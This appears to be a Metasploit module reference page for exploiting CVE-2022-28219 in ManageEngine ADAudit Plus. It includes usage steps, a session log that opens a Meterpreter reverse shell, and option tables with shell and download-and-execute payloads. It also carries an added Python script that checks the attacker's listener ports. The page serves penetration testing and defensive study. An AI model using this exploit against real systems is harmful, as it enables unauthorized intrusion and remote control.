ManageEngine ADAudit Plus CVE-2022-28219 - Metasploit
This page contains detailed information about how to use the exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219 Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ManageEngine ADAudit Plus CVE-2022-28219
Module: exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
Source code: modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb
Disclosure date: 2022-06-29
Last modification time: 2022-08-05 11:34:46 +0000
Supported architecture(s): cmd
Supported platform(s): Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8081, 8443, 8880, 8888
List of CVEs: CVE-2022-28219
This module exploits CVE-2022-28219, a pair of vulnerabilities in ManageEngine ADAudit Plus builds before 7060: a path traversal in the /cewolf endpoint and a blind XXE in the /api/agent/tabs/agentData endpoint, chained to upload a payload file to the server and execute it.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
msf exploit(manageengine_adaudit_plus_cve_2022_28219) > exploit
Required Options
RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
DOMAIN: Active Directory domain that the target monitors
Knowledge Base
Vulnerable Application
The vulnerable application is ManageEngine ADAudit Plus prior to build 7060. I built and tested this on build 7055, which, at least at the time of this writing, you can download here. It's a .exe file that you can install with all the defaults.
You also need to configure ADAudit Plus to actually audit a domain. That means setting up a domain (I created a domain controller in the lab) and configuring ADAudit Plus to scan that domain. That domain name must be passed as the DOMAIN option when using this exploit.
Finally, three connect-back ports must be reachable from the target back to Metasploit (in addition to whatever ports the payload uses). By default, the module uses ports 8080 and 8888 for HTTP and 2121 for FTP.
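Because the module starts three listeners of its own plus the payload handler, the most common setup failure is a port on the attacker host that is already taken (an intercepting proxy sitting on 8080 is the usual culprit), or two options accidentally set to the same port. The following pre-flight check is an added example and is not part of the Metasploit module or this page; it assumes the module defaults shown in the options table (SRVPORT 8080, SRVPORT_HTTP2 8888, SRVPORT_FTP 2121) and the reverse_tcp payload default LPORT 4444, and simply tries to bind each port locally.

```python
"""Pre-flight check of the attacker-side ports this module listens on.

Added example, not part of the Metasploit module: verifies that the three
connect-back listeners (SRVPORT, SRVPORT_HTTP2, SRVPORT_FTP) and the payload
handler (LPORT) use distinct ports and that each can be bound right now.
"""
import socket

# Module defaults from the options table; LPORT is the payload default (assumption).
DEFAULT_LISTENERS = {
    "SRVPORT": 8080,        # hosts the XXE DTDs
    "SRVPORT_HTTP2": 8888,  # held-open XXE request
    "SRVPORT_FTP": 2121,    # fake FTP server receiving the XXE directory listing
    "LPORT": 4444,          # reverse_tcp payload handler
}


def find_collisions(listeners):
    """Return {port: [option names]} for every port assigned to more than one option."""
    by_port = {}
    for name, port in listeners.items():
        by_port.setdefault(port, []).append(name)
    return {port: names for port, names in by_port.items() if len(names) > 1}


def port_is_free(port, host="0.0.0.0"):
    """True if a TCP socket can be bound to host:port at this moment."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            sock.bind((host, port))
        except OSError:
            return False
    return True


def hold_port(port=0, host="127.0.0.1"):
    """Bind and listen on a port (0 = ephemeral) to simulate another tool
    already occupying it; the caller is responsible for closing the socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((host, port))
    sock.listen(1)
    return sock


def preflight(listeners, host="0.0.0.0"):
    """Return a list of human-readable problems; an empty list means ready to run."""
    problems = []
    for port, names in sorted(find_collisions(listeners).items()):
        problems.append(f"port {port} is assigned to more than one option: {', '.join(names)}")
    for name, port in listeners.items():
        if not port_is_free(port, host):
            problems.append(f"{name}={port} is already in use on {host}")
    return problems


if __name__ == "__main__":
    for problem in preflight(DEFAULT_LISTENERS) or ["all listener ports look usable"]:
        print(problem)
```

Run it on the attacker box before `exploit`; if it reports a port in use, change the corresponding SRVPORT* or LPORT option rather than stopping the other tool, since the module will otherwise fail while starting its HTTP or FTP server. The bind test only proves the port is free locally; whether the target can reach it through firewalls is a separate question.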
Verification Steps
- Install the application
- Do: set RHOSTS <IP>
- Do: set DOMAIN <DOMAIN_NAME>
- Do: exploit
- You should get a meterpreter session
Scenarios
msf6 > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set RHOSTS 10.0.0.148
RHOSTS => 10.0.0.148
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set DOMAIN ad.example.local
DOMAIN => ad.example.local
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > exploit
[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. The vulnerable endpoint responds with HTTP/200.
[*] Attempting to exploit XXE to get a list of users
[*] Using URL: http://10.0.0.146:8080/KEmvnPFxS.dtd
[*] User accounts discovered: Ron
[*] Enumerating old payloads cached on the server (to skip later)
[*] Using URL: http://10.0.0.146:8080/NvkXTJXRyhV.dtd
[*] Attempting to exploit XXE to store our serialized payload on the server
[*] Trying to find our payload in all users' temp folders
[*] Using URL: http://10.0.0.146:8080/ppVHiihu.dtd
[*] Executing payload: /users/Ron/appdata/local/temp/jar_cache4413164256015023251.tmp...
[*] Sending stage (175686 bytes) to 10.0.0.148
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.148:52347) at 2022-07-07 15:19:59 -0700
meterpreter >
Options
TARGETURI_DESERIALIZATION / TARGETURI_XXE
The target URLs (/cewolf/logo.png and /api/agent/tabs/agentData by default). These probably never need to be changed.
DOMAIN
A domain that the target monitors. The module cannot validate this value, so if the exploit should work and doesn't, a wrong DOMAIN is the first thing to check.
SRVPORT / SRVPORT_FTP / SRVPORT_HTTP2
The connect-back ports:
- SRVPORT is used to host the XXE payloads (the .dtd files fetched by the target).
- SRVPORT_HTTP2 is used for an XXE payload whose connection is held open, which creates a temporary file on the server.
- SRVPORT_FTP is used for a fake, off-spec FTP server that receives a directory listing, also via XXE.
PATH_TRAVERSAL_DEPTH
The number of ../ sequences to prepend to the path traversal request.
FtpCallbackTimeout / HttpUploadTimeout
How long to wait, in seconds, for the FTP or HTTP callbacks before giving up.
Msfconsole Usage
Here is how the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit module looks in the msfconsole:
msf6 > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show info
Name: ManageEngine ADAudit Plus CVE-2022-28219
Module: exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
Platform: Windows
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2022-06-29
Provided by:
Naveen Sunkavally
Ron Bowes
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Windows Command
Check supported:
Yes
Basic options:
Name                       Current Setting            Required  Description
----                       ---------------            --------  -----------
DOMAIN                                                yes       Active Directory domain that the target monitors
Proxies                                               no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                                                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT                      8081                       yes       The target port (TCP)
SRVHOST                    0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT                    8080                       yes       The local port to listen on.
SRVPORT_FTP                2121                       yes       Port for FTP reverse connection
SRVPORT_HTTP2              8888                       yes       Port for additional HTTP reverse connections
SSL                        false                      no        Negotiate SSL/TLS for outgoing connections
SSLCert                                               no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI_DESERIALIZATION  /cewolf/logo.png           yes       Path traversal and unsafe deserialization endpoint
TARGETURI_XXE              /api/agent/tabs/agentData  yes       XXE endpoint
URIPATH                                               no        The URI to use for this exploit (default is random)
VHOST                                                 no        HTTP server virtual host
Payload information:
Description:
This module exploits CVE-2022-28219, which is a pair of
vulnerabilities in ManageEngine ADAudit Plus versions before build
7060: a path traversal in the /cewolf endpoint, and a blind XXE in,
to upload and execute an executable file.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-28219
https://www.horizon3.ai/red-team-blog-cve-2022-28219/
https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis
https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
Module Options
This is a complete list of options available in the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit:
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show options
Module options (exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219):
Name                       Current Setting            Required  Description
----                       ---------------            --------  -----------
DOMAIN                                                yes       Active Directory domain that the target monitors
Proxies                                               no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                                                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT                      8081                       yes       The target port (TCP)
SRVHOST                    0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT                    8080                       yes       The local port to listen on.
SRVPORT_FTP                2121                       yes       Port for FTP reverse connection
SRVPORT_HTTP2              8888                       yes       Port for additional HTTP reverse connections
SSL                        false                      no        Negotiate SSL/TLS for outgoing connections
SSLCert                                               no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI_DESERIALIZATION  /cewolf/logo.png           yes       Path traversal and unsafe deserialization endpoint
TARGETURI_XXE              /api/agent/tabs/agentData  yes       XXE endpoint
URIPATH                                               no        The URI to use for this exploit (default is random)
VHOST                                                 no        HTTP server virtual host
Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.0.126    yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
Advanced Options
Here is a complete list of advanced options supported by the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit:
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show advanced
Module advanced options (exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
CMDSTAGER::DECODER no The decoder stub to use.
CMDSTAGER::FLAVOR auto no The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_invokewebrequest, ftp_http)
CMDSTAGER::SSL false no Use SSL/TLS for supported stagers
CMDSTAGER::TEMP no Writable directory for staged files
CMDSTAGER::URIPATH no Payload URI path for supported stagers
ContextInformationFile no The information file that contains context information
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
FtpCallbackTimeout 5 yes The amount of time, in seconds, the FTP server will wait for a reverse connection
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUploadTimeout 5 yes The amount of time, in seconds, the HTTP file-upload server will wait for a reverse connection
HttpUsername no The HTTP username to specify for authentication
ListenerBindAddress no The specific IP address to bind to if different from SRVHOST
ListenerBindPort no The port to bind to if different from SRVPORT
ListenerComm no The specific communication channel to use for this service
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PATH_TRAVERSAL_DEPTH 20 yes The number of `../` to prepend to the path traversal attempt
Powershell::encode_final_payload false yes Encode final payload for -EncodedCommand
Powershell::encode_inner_payload false yes Encode inner payload for -EncodedCommand
Powershell::exec_in_place false yes Produce PSH without executable wrapper
Powershell::exec_rc4 false yes Encrypt PSH with RC4
Powershell::method reflection yes Payload delivery method (Accepted: net, reflection, old, msil)
Powershell::no_equals false yes Pad base64 until no "=" remains
Powershell::noninteractive true yes Execute powershell without interaction
Powershell::persist false yes Run the payload in a loop
Powershell::prepend_protections_bypass auto yes Prepend AMSI/SBL bypass (Accepted: auto, true, false)
Powershell::prepend_sleep no Prepend seconds of sleep
Powershell::remove_comspec false yes Produce script calling powershell directly
Powershell::strip_comments true yes Strip comments
Powershell::strip_whitespace false yes Strip whitespace
Powershell::sub_funcs false yes Substitute function names
Powershell::sub_vars true yes Substitute variable names
Powershell::wrap_double_quotes true yes Wraps the -Command argument in single quotes
ReverseListenerComm no The specific communication channel to use for this listener
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 12.2; rv:97.0) Gecko/20100101 Firefox/97.0 no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (cmd/windows/powershell/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
Powershell::encode_final_payload false yes Encode final payload for -EncodedCommand
Powershell::encode_inner_payload false yes Encode inner payload for -EncodedCommand
Powershell::exec_in_place false yes Produce PSH without executable wrapper
Powershell::exec_rc4 false yes Encrypt PSH with RC4
Powershell::method reflection yes Payload delivery method (Accepted: net, reflection, old, msil)
Powershell::no_equals false yes Pad base64 until no "=" remains
Powershell::noninteractive true yes Execute powershell without interaction
Powershell::persist false yes Run the payload in a loop
Powershell::prepend_protections_bypass auto yes Prepend AMSI/SBL bypass (Accepted: auto, true, false)
Powershell::prepend_sleep no Prepend seconds of sleep
Powershell::remove_comspec false yes Produce script calling powershell directly
Powershell::strip_comments true yes Strip comments
Powershell::strip_whitespace false yes Strip whitespace
Powershell::sub_funcs false yes Substitute function names
Powershell::sub_vars true yes Substitute variable names
Powershell::wrap_double_quotes true yes Wraps the -Command argument in single quotes
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/http/manageengine_adaudit_plus_cve_2022_28219 module can exploit:
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Command
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit:
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/windows/adduser normal No Windows Execute net user /ADD CMD
1 payload/cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua)
2 payload/cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl)
3 payload/cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6
4 payload/cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby)
5 payload/cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS
6 payload/cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs)
7 payload/cmd/windows/generic normal No Windows Command, Generic Command Execution
8 payload/cmd/windows/jjs_reverse_tcp normal No Windows Shell, Reverse TCP (via jjs)
9 payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp normal No Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager
10 payload/cmd/windows/powershell/custom/bind_hidden_tcp normal No Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager
11 payload/cmd/windows/powershell/custom/bind_ipv6_tcp normal No Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
12 payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)
13 payload/cmd/windows/powershell/custom/bind_named_pipe normal No Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager
14 payload/cmd/windows/powershell/custom/bind_nonx_tcp normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)
15 payload/cmd/windows/powershell/custom/bind_tcp normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)
16 payload/cmd/windows/powershell/custom/bind_tcp_rc4 normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
17 payload/cmd/windows/powershell/custom/bind_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)
18 payload/cmd/windows/powershell/custom/reverse_hop_http normal No Powershell Exec, Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager
19 payload/cmd/windows/powershell/custom/reverse_http normal No Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)
20 payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore normal No Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy
21 payload/cmd/windows/powershell/custom/reverse_https normal No Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)
22 payload/cmd/windows/powershell/custom/reverse_https_proxy normal No Powershell Exec, Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy
23 payload/cmd/windows/powershell/custom/reverse_ipv6_tcp normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)
24 payload/cmd/windows/powershell/custom/reverse_named_pipe normal No Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager
25 payload/cmd/windows/powershell/custom/reverse_nonx_tcp normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)
26 payload/cmd/windows/powershell/custom/reverse_ord_tcp normal No Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)
27 payload/cmd/windows/powershell/custom/reverse_tcp normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager
28 payload/cmd/windows/powershell/custom/reverse_tcp_allports normal No Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager
29 payload/cmd/windows/powershell/custom/reverse_tcp_dns normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)
30 payload/cmd/windows/powershell/custom/reverse_tcp_rc4 normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
31 payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
32 payload/cmd/windows/powershell/custom/reverse_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support
33 payload/cmd/windows/powershell/custom/reverse_udp normal No Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support
34 payload/cmd/windows/powershell/custom/reverse_winhttp normal No Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)
35 payload/cmd/windows/powershell/custom/reverse_winhttps normal No Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)
36 payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
37 payload/cmd/windows/powershell/dllinject/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
38 payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
39 payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
40 payload/cmd/windows/powershell/dllinject/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
41 payload/cmd/windows/powershell/dllinject/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
42 payload/cmd/windows/powershell/dllinject/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
43 payload/cmd/windows/powershell/dllinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
44 payload/cmd/windows/powershell/dllinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
45 payload/cmd/windows/powershell/dllinject/reverse_hop_http normal No Powershell Exec, Reverse Hop HTTP/HTTPS Stager
46 payload/cmd/windows/powershell/dllinject/reverse_http normal No Powershell Exec, Windows Reverse HTTP Stager (wininet)
47 payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore normal No Powershell Exec, Reverse HTTP Stager Proxy
48 payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
49 payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
50 payload/cmd/windows/powershell/dllinject/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
51 payload/cmd/windows/powershell/dllinject/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
52 payload/cmd/windows/powershell/dllinject/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
53 payload/cmd/windows/powershell/dllinject/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
54 payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
55 payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
56 payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
57 payload/cmd/windows/powershell/dllinject/reverse_winhttp normal No Powershell Exec, Windows Reverse HTTP Stager (winhttp)
58 payload/cmd/windows/powershell/dns_txt_query_exec normal No Powershell Exec, DNS TXT Record Payload Download and Execution
59 payload/cmd/windows/powershell/download_exec normal No Powershell Exec, Windows Executable Download (http,https,ftp) and Execute
60 payload/cmd/windows/powershell/exec normal No Powershell Exec
61 payload/cmd/windows/powershell/generic/debug_trap normal No Powershell Exec, Generic x86 Debug Trap
62 payload/cmd/windows/powershell/generic/tight_loop normal No Powershell Exec, Generic x86 Tight Loop
63 payload/cmd/windows/powershell/loadlibrary normal No Powershell Exec
64 payload/cmd/windows/powershell/messagebox normal No Powershell Exec, Windows MessageBox
65 payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
66 payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
67 payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
68 payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
69 payload/cmd/windows/powershell/meterpreter/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
70 payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
71 payload/cmd/windows/powershell/meterpreter/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
72 payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
73 payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
74 payload/cmd/windows/powershell/meterpreter/reverse_hop_http normal No Powershell Exec, Reverse Hop HTTP/HTTPS Stager
75 payload/cmd/windows/powershell/meterpreter/reverse_http normal No Powershell Exec, Windows Reverse HTTP Stager (wininet)
76 payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore normal No Powershell Exec, Reverse HTTP Stager Proxy
77 payload/cmd/windows/powershell/meterpreter/reverse_https normal No Powershell Exec, Windows Reverse HTTPS Stager (wininet)
78 payload/cmd/windows/powershell/meterpreter/reverse_https_proxy normal No Powershell Exec, Reverse HTTPS Stager with Support for Custom Proxy
79 payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
80 payload/cmd/windows/powershell/meterpreter/reverse_named_pipe normal No Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
81 payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
82 payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
83 payload/cmd/windows/powershell/meterpreter/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
84 payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
85 payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
86 payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
87 payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
88 payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
